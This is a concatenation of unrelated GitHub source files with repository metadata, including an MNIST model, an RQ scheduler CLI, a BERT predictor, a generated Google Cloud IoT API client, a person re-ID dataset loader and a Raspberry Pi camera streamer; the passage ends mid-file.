30612cf5dfad62cf5a0a6782eac0b94e52925ce5
|
26cc17706223a5f307d5b2a578620b436ce2eb69
|
/cnn/linear_model.py
|
6b8b70c74ac2649da865907d9fc859f736cc2c20
|
[] |
no_license
|
tanimutomo/webapp_mnist
|
6d3bbca2d32cd565d39e925ec200534b78bde0a1
|
7f9a8a2788b8c394aa318d5b0441b313c50a7b48
|
refs/heads/master
| 2020-03-17T07:31:40.724322 | 2019-02-11T05:30:29 | 2019-02-11T05:30:29 | 133,393,206 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 333 |
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class Linear_mnist(nn.Module):
def __init__(self):
super(Linear_mnist, self).__init__()
self.fc = nn.Linear(784, 10)
def forward(self, x):
x = x.view(-1, 28 * 28)
x = self.fc(x)
x = F.softmax(x, 1)
return x
|
[
"[email protected]"
] | |
fb94fc1597debf5a7a51e313349f8349d6bfb26d
|
0cc4eb3cb54f8394c127ace62d3108fdb5230c85
|
/.spack-env/view/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/_codecs.pyi
|
cc46a5a2b0b4513b177439dd5c53dfa3f3058b1e
|
[] |
no_license
|
jacobmerson/spack-develop-env
|
5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8
|
5fca20ca343b1a76f05fc635c87f94ed25417d94
|
refs/heads/master
| 2022-07-04T02:22:50.264727 | 2020-05-06T05:13:50 | 2020-05-06T05:13:50 | 261,657,112 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 190 |
pyi
|
/lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/py-jedi-0.17.0-zugnvpgjfmuk5x4rfhhxlsknl2g226yt/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/_codecs.pyi
|
[
"[email protected]"
] | |
db75e1888c9f05e37ce8b679dcb3e6804cadf62f
|
bef617e43198b5acd5f019f58fcef9a6b3bcf77a
|
/choreo/scheduler/scripts/rqscheduler.py
|
745b1972d9a5353c62bf9ffe794549cb68a2b982
|
[
"MIT"
] |
permissive
|
Mizzlr/choreo
|
c60dc9f39dd03a5ba3b3492bca64149bc4df177a
|
e8487b87d26640ea8826a42ef42514160decc373
|
refs/heads/master
| 2020-05-17T02:27:29.022357 | 2019-05-06T09:01:00 | 2019-05-06T09:10:17 | 183,454,970 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,752 |
py
|
#!/usr/bin/env python
import argparse
import sys
import os
from redis import Redis
from choreo.scheduler.scheduler import Scheduler
from choreo.scheduler.utils import setup_loghandlers
from choreo.multirq.cli.cli import main as multirq
@multirq.command()
def scheduler():
parser = argparse.ArgumentParser(description='Runs RQ scheduler')
parser.add_argument('-b', '--burst', action='store_true', default=False, help='Run in burst mode (quit after all work is done)')
parser.add_argument('-H', '--host', default=os.environ.get('RQ_REDIS_HOST', 'localhost'), help="Redis host")
parser.add_argument('-p', '--port', default=int(os.environ.get('RQ_REDIS_PORT', 6379)), type=int, help="Redis port number")
parser.add_argument('-d', '--db', default=int(os.environ.get('RQ_REDIS_DB', 0)), type=int, help="Redis database")
parser.add_argument('-P', '--password', default=os.environ.get('RQ_REDIS_PASSWORD'), help="Redis password")
parser.add_argument('--verbose', '-v', action='store_true', default=True, help='Show more output')
parser.add_argument('--quiet', action='store_true', default=False, help='Show less output')
parser.add_argument('--url', '-u', default=os.environ.get('RQ_REDIS_URL')
, help='URL describing Redis connection details. \
Overrides other connection arguments if supplied.')
parser.add_argument('-i', '--interval', default=5.0, type=float
, help="How often the scheduler checks for new jobs to add to the \
queue (in seconds, can be floating-point for more precision).")
parser.add_argument('--path', default='.', help='Specify the import path.')
parser.add_argument('--pid', help='A filename to use for the PID file.', metavar='FILE')
parser.add_argument('-j', '--job-class', help='Custom RQ Job class')
parser.add_argument('-q', '--queue-class', help='Custom RQ Queue class')
args = parser.parse_args(sys.argv[2:])
if args.path:
sys.path = args.path.split(':') + sys.path
if args.pid:
pid = str(os.getpid())
filename = args.pid
with open(filename, 'w') as f:
f.write(pid)
if args.url is not None:
connection = Redis.from_url(args.url)
else:
connection = Redis(args.host, args.port, args.db, args.password)
if args.verbose:
level = 'DEBUG'
elif args.quiet:
level = 'WARNING'
else:
level = 'INFO'
setup_loghandlers(level)
scheduler = Scheduler(connection=connection,
interval=args.interval,
job_class=args.job_class,
queue_class=args.queue_class)
scheduler.run(burst=args.burst)
if __name__ == '__main__':
scheduler()
|
[
"[email protected]"
] | |
e4ae7195bcb012b25bf0ef8fa2bb76dc9bcedafa
|
af5a48ef76dd701f888f3884ceb5e39aced63edf
|
/bert_predict_new.py
|
e14188b764c01f28de8bf056a27961f829ed16a1
|
[] |
no_license
|
240648795/nlp_test
|
87bae9352d741463525d1dfcc05c0f1860bb75dc
|
667b7a3a41024319aae377c00f2618d907dcd3e1
|
refs/heads/master
| 2023-02-03T23:44:26.631170 | 2020-12-16T03:08:56 | 2020-12-16T03:08:56 | 321,285,360 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,752 |
py
|
import joblib
from keras_bert import get_custom_objects
from keras.models import load_model
import numpy as np
from bert_train import acc_top2, data_generator
from keras.utils import to_categorical
import gc
import keras.backend as K
def load_model_encoder_details(model_path, encoder_path, details_path):
custom_objects = get_custom_objects()
my_objects = {'acc_top2': acc_top2}
custom_objects.update(my_objects)
model = load_model(model_path, custom_objects=custom_objects)
encoder = joblib.load(encoder_path)
nclass_dict = joblib.load(details_path)
return model, encoder, nclass_dict['nclass']
def predict_one(raw_text,model, encoder, nclass):
text = raw_text
DATA_text = []
DATA_text.append((text, to_categorical(0, nclass)))
DATA_text = np.array(DATA_text)
text = data_generator(DATA_text, shuffle=False)
test_model_pred = model.predict_generator(text.__iter__(), steps=len(text), verbose=1)
predict_num=np.argmax(test_model_pred)
predict_label=encoder.inverse_transform([predict_num])
return predict_label[0]
if __name__ == '__main__':
#必须加载模型带r
model, encoder, nclass = load_model_encoder_details(r'model\bert_model.h5',
r'model\bert_model_encoder.joblib',
r'model\bert_model_details.joblib')
# 单独评估一个本来分类
text = '支架过于单薄。导致支撑不平衡。更换新件后试车正常'
predict_label=predict_one(text,model, encoder, nclass)
print (predict_label)
del model # 删除模型减少缓存
gc.collect() # 清理内存
K.clear_session() # clear_session就是清除一个session
|
[
"[email protected]"
] | |
e1a70889e373ca860d381781148acddcf9e13a57
|
d1ddb9e9e75d42986eba239550364cff3d8f5203
|
/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/cloudiot/v1beta1/cloudiot_v1beta1_client.py
|
b2ff82c30ed6816f1ea9058a0ee4fe9536f38a48
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
bopopescu/searchparty
|
8ecd702af0d610a7ad3a8df9c4d448f76f46c450
|
afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6
|
refs/heads/master
| 2022-11-19T14:44:55.421926 | 2017-07-28T14:55:43 | 2017-07-28T14:55:43 | 282,495,798 | 0 | 0 |
Apache-2.0
| 2020-07-25T17:48:53 | 2020-07-25T17:48:52 | null |
UTF-8
|
Python
| false | false | 21,034 |
py
|
"""Generated client library for cloudiot version v1beta1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.cloudiot.v1beta1 import cloudiot_v1beta1_messages as messages
class CloudiotV1beta1(base_api.BaseApiClient):
"""Generated client library for service cloudiot version v1beta1."""
MESSAGES_MODULE = messages
BASE_URL = u'https://cloudiot.googleapis.com/'
_PACKAGE = u'cloudiot'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform', u'https://www.googleapis.com/auth/cloudiot']
_VERSION = u'v1beta1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_CLIENT_CLASS_NAME = u'CloudiotV1beta1'
_URL_VERSION = u'v1beta1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new cloudiot handle."""
url = url or self.BASE_URL
super(CloudiotV1beta1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.projects_locations_registries_devices_configVersions = self.ProjectsLocationsRegistriesDevicesConfigVersionsService(self)
self.projects_locations_registries_devices = self.ProjectsLocationsRegistriesDevicesService(self)
self.projects_locations_registries = self.ProjectsLocationsRegistriesService(self)
self.projects_locations = self.ProjectsLocationsService(self)
self.projects = self.ProjectsService(self)
class ProjectsLocationsRegistriesDevicesConfigVersionsService(base_api.BaseApiService):
"""Service class for the projects_locations_registries_devices_configVersions resource."""
_NAME = u'projects_locations_registries_devices_configVersions'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesDevicesConfigVersionsService, self).__init__(client)
self._upload_configs = {
}
def List(self, request, global_params=None):
"""Lists the last few versions of the device configuration in descending.
order (i.e.: newest first).
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesConfigVersionsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDeviceConfigVersionsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}/configVersions',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.configVersions.list',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'numVersions'],
relative_path=u'v1beta1/{+name}/configVersions',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesConfigVersionsListRequest',
response_type_name=u'ListDeviceConfigVersionsResponse',
supports_download=False,
)
class ProjectsLocationsRegistriesDevicesService(base_api.BaseApiService):
"""Service class for the projects_locations_registries_devices resource."""
_NAME = u'projects_locations_registries_devices'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesDevicesService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
"""Creates a device in a device registry.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.devices.create',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[],
relative_path=u'v1beta1/{+parent}/devices',
request_field=u'device',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesCreateRequest',
response_type_name=u'Device',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'DELETE',
method_id=u'cloudiot.projects.locations.registries.devices.delete',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesDeleteRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Gets details about a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.get',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesGetRequest',
response_type_name=u'Device',
supports_download=False,
)
def List(self, request, global_params=None):
"""List devices in a device registry.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDevicesResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.devices.list',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[u'deviceIds', u'deviceNumIds', u'fieldMask', u'pageSize', u'pageToken'],
relative_path=u'v1beta1/{+parent}/devices',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesListRequest',
response_type_name=u'ListDevicesResponse',
supports_download=False,
)
def ModifyCloudToDeviceConfig(self, request, global_params=None):
"""Modifies the configuration for the device, which is eventually sent from.
the Cloud IoT servers. Returns the modified configuration version and its
meta-data.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesModifyCloudToDeviceConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceConfig) The response message.
"""
config = self.GetMethodConfig('ModifyCloudToDeviceConfig')
return self._RunMethod(
config, request, global_params=global_params)
ModifyCloudToDeviceConfig.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}:modifyCloudToDeviceConfig',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.devices.modifyCloudToDeviceConfig',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}:modifyCloudToDeviceConfig',
request_field=u'modifyCloudToDeviceConfigRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesModifyCloudToDeviceConfigRequest',
response_type_name=u'DeviceConfig',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a device.
Args:
request: (CloudiotProjectsLocationsRegistriesDevicesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Device) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}/devices/{devicesId}',
http_method=u'PATCH',
method_id=u'cloudiot.projects.locations.registries.devices.patch',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'updateMask'],
relative_path=u'v1beta1/{+name}',
request_field=u'device',
request_type_name=u'CloudiotProjectsLocationsRegistriesDevicesPatchRequest',
response_type_name=u'Device',
supports_download=False,
)
class ProjectsLocationsRegistriesService(base_api.BaseApiService):
"""Service class for the projects_locations_registries resource."""
_NAME = u'projects_locations_registries'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsRegistriesService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
"""Creates a device registry that contains devices.
Args:
request: (CloudiotProjectsLocationsRegistriesCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.create',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[],
relative_path=u'v1beta1/{+parent}/registries',
request_field=u'deviceRegistry',
request_type_name=u'CloudiotProjectsLocationsRegistriesCreateRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'DELETE',
method_id=u'cloudiot.projects.locations.registries.delete',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesDeleteRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Gets a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.get',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1beta1/{+name}',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesGetRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def GetIamPolicy(self, request, global_params=None):
"""Gets the access control policy for a resource.
Returns an empty policy if the resource exists and does not have a policy
set.
Args:
request: (CloudiotProjectsLocationsRegistriesGetIamPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Policy) The response message.
"""
config = self.GetMethodConfig('GetIamPolicy')
return self._RunMethod(
config, request, global_params=global_params)
GetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:getIamPolicy',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.getIamPolicy',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:getIamPolicy',
request_field=u'getIamPolicyRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesGetIamPolicyRequest',
response_type_name=u'Policy',
supports_download=False,
)
def List(self, request, global_params=None):
"""Lists device registries.
Args:
request: (CloudiotProjectsLocationsRegistriesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDeviceRegistriesResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries',
http_method=u'GET',
method_id=u'cloudiot.projects.locations.registries.list',
ordered_params=[u'parent'],
path_params=[u'parent'],
query_params=[u'pageSize', u'pageToken'],
relative_path=u'v1beta1/{+parent}/registries',
request_field='',
request_type_name=u'CloudiotProjectsLocationsRegistriesListRequest',
response_type_name=u'ListDeviceRegistriesResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a device registry configuration.
Args:
request: (CloudiotProjectsLocationsRegistriesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DeviceRegistry) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}',
http_method=u'PATCH',
method_id=u'cloudiot.projects.locations.registries.patch',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[u'updateMask'],
relative_path=u'v1beta1/{+name}',
request_field=u'deviceRegistry',
request_type_name=u'CloudiotProjectsLocationsRegistriesPatchRequest',
response_type_name=u'DeviceRegistry',
supports_download=False,
)
def SetIamPolicy(self, request, global_params=None):
"""Sets the access control policy on the specified resource. Replaces any.
existing policy.
Args:
request: (CloudiotProjectsLocationsRegistriesSetIamPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Policy) The response message.
"""
config = self.GetMethodConfig('SetIamPolicy')
return self._RunMethod(
config, request, global_params=global_params)
SetIamPolicy.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:setIamPolicy',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.setIamPolicy',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:setIamPolicy',
request_field=u'setIamPolicyRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesSetIamPolicyRequest',
response_type_name=u'Policy',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
If the resource does not exist, this will return an empty set of
permissions, not a NOT_FOUND error.
Args:
request: (CloudiotProjectsLocationsRegistriesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestIamPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1beta1/projects/{projectsId}/locations/{locationsId}/registries/{registriesId}:testIamPermissions',
http_method=u'POST',
method_id=u'cloudiot.projects.locations.registries.testIamPermissions',
ordered_params=[u'resource'],
path_params=[u'resource'],
query_params=[],
relative_path=u'v1beta1/{+resource}:testIamPermissions',
request_field=u'testIamPermissionsRequest',
request_type_name=u'CloudiotProjectsLocationsRegistriesTestIamPermissionsRequest',
response_type_name=u'TestIamPermissionsResponse',
supports_download=False,
)
class ProjectsLocationsService(base_api.BaseApiService):
"""Service class for the projects_locations resource."""
_NAME = u'projects_locations'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsLocationsService, self).__init__(client)
self._upload_configs = {
}
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = u'projects'
def __init__(self, client):
super(CloudiotV1beta1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
|
[
"[email protected]"
] | |
adce83a22777b2ebe8fe30f555671f0d10599045
|
580a43c9bc8cc5cd5db745155e0721b5ba1664f6
|
/S3-Notifications-Lambda/output.py
|
8df38b8094739a3b3654a3327667dd092c71eb2e
|
[
"Apache-2.0"
] |
permissive
|
Jardo72/AWS-Sandbox
|
e10e750a955701cb341b4133544f9e081378f37f
|
b0402295e9097027c12b1954df967a0ac4d5163d
|
refs/heads/master
| 2023-07-08T21:02:30.360536 | 2023-06-30T09:07:23 | 2023-06-30T09:07:23 | 216,329,685 | 1 | 1 |
Apache-2.0
| 2023-05-23T04:57:47 | 2019-10-20T08:21:58 |
HCL
|
UTF-8
|
Python
| false | false | 1,983 |
py
|
#
# Copyright 2021 Jaroslav Chmurny
#
# This file is part of AWS Sandbox.
#
# AWS Sandbox is free software developed for educational purposes. It
# is licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicationlicationlicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Sequence
from model import StandingsEntry
def _column_headings() -> str:
return ' GP RW OW OL RL GF:GA PTS\n'
def _standings_entries(entries: Sequence[StandingsEntry]) -> str:
result = ''
for index, single_entry in enumerate(entries):
rank = index + 1
result += f'{rank:2}.{single_entry.team} '
result += f'{single_entry.overall_game_count:2d} '
result += f'{single_entry.regulation_win_count:2d} '
result += f'{single_entry.overtime_win_count:2d} '
result += f'{single_entry.overtime_loss_count:2d} '
result += f'{single_entry.regulation_loss_count:2d} '
result += f'{single_entry.goals_for:2d}:'
result += f'{single_entry.goals_against:2d} '
result += f'{single_entry.points:3d}\n'
return result
def _legend() -> str:
return """
Legend
GP .... Games Played
RW .... Regulation Wins
OW .... Overtime + Shootout Wins
OL .... Overtime + Shootout Losses
RL .... Regulation Losses
GF .... Goals For
GF .... Goals Against
PTS ... Points
"""
def print_standings(entries: Sequence[StandingsEntry]) -> str:
return _column_headings() + _standings_entries(entries) + _legend()
|
[
"[email protected]"
] | |
77f88b6cb7d386f11e85007e8f911227e7ffdaa8
|
dea9f25321014fb3a374846d4d5491175d0b09f6
|
/assignment14/ass14_1.py
|
4690479dbd447aa9498b90131144d516f7ce8e9e
|
[] |
no_license
|
malay190/Assignment_Solutions
|
9a994a510ab7ba61d1d8d8c059c1ecafd3a7e049
|
48ec569e40fa4094a88739407f9fbe4f6dae1e77
|
refs/heads/master
| 2020-03-20T03:50:27.583251 | 2018-07-09T15:53:54 | 2018-07-09T15:53:54 | 137,161,356 | 0 | 3 | null | 2019-10-15T04:44:26 | 2018-06-13T04:10:36 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 196 |
py
|
#Q.1- Write a Python program to read last n lines of a file
n=int(input("enter the last n lines you want to read:"))
f=open('test.txt')
content=f.readlines()
while n>0:
print(content[-n])
n-=1
|
[
"[email protected]"
] | |
ae06705854bfb94e12685e6ba2471012f9fd8daf
|
fa075e513471921afc02cf6b3ca39dfe4e73527c
|
/data/datasets/image/dukemtmcreid.py
|
be51ab0bda286a3be2c4d26ff9623e0c99f2af27
|
[
"MIT"
] |
permissive
|
Yinsongxu/MVMP_MFFN
|
99bbcadbea6a76ccd177ff94aa102f041cc8134e
|
2024197ca1f1d7f2f52ccbce08eb85dd282de70d
|
refs/heads/main
| 2023-05-05T20:29:00.041869 | 2021-05-30T09:23:58 | 2021-05-30T09:23:58 | 372,161,994 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,530 |
py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import sys
import os
import os.path as osp
import glob
import re
from data.datasets import ImageDataset
class DukeMTMCreID(ImageDataset):
"""DukeMTMC-reID.
Reference:
- Ristani et al. Performance Measures and a Data Set for Multi-Target, Multi-Camera Tracking. ECCVW 2016.
- Zheng et al. Unlabeled Samples Generated by GAN Improve the Person Re-identification Baseline in vitro. ICCV 2017.
URL: `<https://github.com/layumi/DukeMTMC-reID_evaluation>`_
Dataset statistics:
- identities: 1404 (train + query).
- images:16522 (train) + 2228 (query) + 17661 (gallery).
- cameras: 8.
"""
dataset_dir = 'dukemtmc-reid'
dataset_url = 'http://vision.cs.duke.edu/DukeMTMC/data/misc/DukeMTMC-reID.zip'
def __init__(self, root='', **kwargs):
self.root = osp.abspath(osp.expanduser(root))
self.dataset_dir = self.root
#self.download_dataset(self.dataset_dir, self.dataset_url)
self.train_dir = osp.join(self.dataset_dir, 'DukeMTMC-reID/bounding_box_train')
self.query_dir = osp.join(self.dataset_dir, 'DukeMTMC-reID/query')
self.gallery_dir = osp.join(self.dataset_dir, 'DukeMTMC-reID/bounding_box_test')
required_files = [
self.dataset_dir,
self.train_dir,
self.query_dir,
self.gallery_dir
]
self.check_before_run(required_files)
train = self.process_dir(self.train_dir, relabel=True)
query = self.process_dir(self.query_dir, relabel=False)
gallery = self.process_dir(self.gallery_dir, relabel=False)
super(DukeMTMCreID, self).__init__(train, query, gallery, **kwargs)
def process_dir(self, dir_path, relabel=False):
img_paths = glob.glob(osp.join(dir_path, '*.jpg'))
pattern = re.compile(r'([-\d]+)_c(\d)')
pid_container = set()
for img_path in img_paths:
pid, _ = map(int, pattern.search(img_path).groups())
pid_container.add(pid)
pid2label = {pid:label for label, pid in enumerate(pid_container)}
data = []
for img_path in img_paths:
pid, camid = map(int, pattern.search(img_path).groups())
assert 1 <= camid <= 8
camid -= 1 # index starts from 0
if relabel: pid = pid2label[pid]
data.append((img_path, pid, camid))
return data
|
[
"[email protected]"
] | |
62d885e2dfc1f0c0f22c2711cb0bcfabeb0641b3
|
0942ec9cdda81f754d05ae9893605769ed5c1111
|
/flask-video-streaming/camera_pi.py
|
f94a07a7875d2c5f6778403d01ea02da3986608e
|
[
"MIT"
] |
permissive
|
sourceperl/rpi.webcam.pi3
|
f9fa061bc05bab9720c9e372c96f65e431ad5673
|
ea8559ca93f771250961a63fbe0f7acc3a7a2338
|
refs/heads/master
| 2020-12-25T14:38:24.234521 | 2016-07-21T14:56:01 | 2016-07-21T14:56:01 | 63,687,773 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,607 |
py
|
import time
import io
import threading
import picamera
class Camera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
def initialize(self):
if Camera.thread is None:
# start background frame thread
Camera.thread = threading.Thread(target=self._thread)
Camera.thread.daemon = True
Camera.thread.start()
# wait until frames start to be available
while self.frame is None:
time.sleep(0)
def get_frame(self):
Camera.last_access = time.time()
self.initialize()
return self.frame
@classmethod
def _thread(cls):
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (640, 480)
camera.hflip = True
camera.vflip = True
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there hasn't been any clients asking for frames in
